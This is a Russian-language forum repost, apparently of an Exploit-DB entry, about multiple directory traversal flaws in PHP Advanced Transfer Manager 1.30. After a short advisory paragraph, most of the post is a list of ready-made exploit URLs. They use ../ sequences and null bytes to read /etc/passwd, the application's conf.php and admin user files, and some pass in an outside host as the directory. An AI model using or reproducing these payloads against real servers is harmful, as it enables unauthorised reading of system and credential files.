Exploit PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
26286
Проверка EDB
  1. Пройдено
Автор
RGOD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2005-09-20
Код:
source: https://www.securityfocus.com/bid/14883/info

PHP Advanced Transfer Manager is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Exploitation of any of these vulnerabilities could lead to a loss of confidentiality. Information obtained may aid in further attacks against the underlying system; other attacks are also possible. 

http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=http://www.asite.com%00
http://www.example.com/phpatm/html.php?current_dir=http:/&filename=www.asite.com
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../../[filename].zip%00
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../..&filename=[filename].zip
http://www.example.com/phpatm/viewers/txt.php?current_dir=../include&filename=conf.php
http://www.example.com/phpatmviewers/txt.php?current_dir=../userstat&filename=[admin_name].stat
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/admin%00
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/[admin_name]%00
 
Источник
www.exploit-db.com

Похожие темы